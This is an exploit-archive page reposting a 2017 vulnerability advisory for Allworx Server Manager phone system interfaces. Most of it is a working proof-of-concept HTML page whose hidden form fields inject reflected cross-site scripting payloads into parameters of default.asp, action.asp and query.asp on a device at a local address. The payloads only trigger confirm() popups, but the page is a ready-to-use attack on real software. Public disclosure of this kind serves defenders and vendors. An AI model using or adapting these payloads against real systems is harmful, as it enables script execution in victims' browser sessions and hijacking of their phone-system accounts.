首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Allworx Server Manager 6x / 6x12 / 48x Cross Site Scripting
来源:zeroscience.mk 作者:LiquidWorm 发布时间:2017-11-15  
<!DOCTYPE html>
<!--


Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities


Vendor: Allworx Corporation
Product web page: https://www.allworx.com
Affected version: 6x, 6x12 and 48x

Summary: The Allworx phone system enables users to manage
voicemails in the Allworx Message Center and customize the
personal phone system configurations using My Allworx Manager.

Desc: Allworx server manager interface suffers from multiple
reflected XSS vulnerabilities when input passed via several
parameters to several scripts is not properly sanitized before
being returned to the user. This can be exploited to execute
arbitrary HTML and script code in a user's browser session in
context of an affected site.

Tested on: Microsoft Windows 10
           Server IST OIS


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2017-5440
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5440.php


31.10.2017

-->


<html>
<head>
<title>Allworx Server Manager Multiple Cross-Site Scripting Vulnerabilities</title>
</head>

<body>
<script>history.pushState('', '', '/')</script>

<br />::: default.asp :::<br />
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nabla;

<form action="http://192.168.2.254/default.asp">
  <input type="hidden" name="Tab" value='MyConferences"><script>confirm(0)</script>' />
  <input type="hidden" name="SessionID" value='0000"><script>confirm(1)</script>' />
  <input type="hidden" name="Op" value="ModConf" />
  <input type="hidden" name="key" value='2"><script>confirm(2)</script>' />
  <input type="submit" value="Submit request 1" />
</form>

<br />::: action.asp :::<br />
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nabla;

<form action="http://192.168.2.254/action.asp">
  <input type="hidden" name="action" value='selectActivePresence"><script>confirm(3)</script>' />
  <input type="hidden" name="SessionID" value="zsl" />
  <input type="hidden" name="LoginName" value="admin" />
  <input type="hidden" name="Presence" value="0" />
  <input type="hidden" name="AnnounceOnlyIndices" value="" />
  <input type="submit" value="Submit request 2" />
</form>

<br />::: query.asp :::<br />
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nabla;

<form action="http://192.168.2.254/query.asp">
  <input type="hidden" name="query" value="RepQuery<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(4)'/></a>" />
  <input type="hidden" name="SessionID" value="251<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(5)'/></a>" />
  <input type="hidden" name="repName" value="SystemSettings" />
  <input type="hidden" name="fields" value="sysProfileName,hostLanTcpIpAddress,hostWanTcpIpAddress" />
  <input type="hidden" name="groupName" value="records<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(6)'/></a>" />
  <input type="hidden" name="recName" value="record<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='confirm(7)'/></a>" />
  <input type="hidden" name="rnd" value="20435" />
  <input type="submit" value="Submit request 3" />
</form>

</body>
</html>

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·D-Link DIR-850L Unauthenticate
·PHP 7.1.8 - Heap-Based Buffer
·IKARUS anti.virus 2.16.7 - 'nt
·Ulterius Server < 1.9.5.0 - Di
·Web Viewer 1.0.0.193 (Samsung
·Wireless IP Camera (P2P) WIFIC
·Xlight FTP Server 3.8.8.5 - Bu
·Dup Scout Enterprise 10.0.18 -
·Symantec Endpoint Protection 1
·D-Link DIR605L - Denial of Ser
·Microsoft Internet Explorer 11
·Microsoft Edge Object.setProto
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved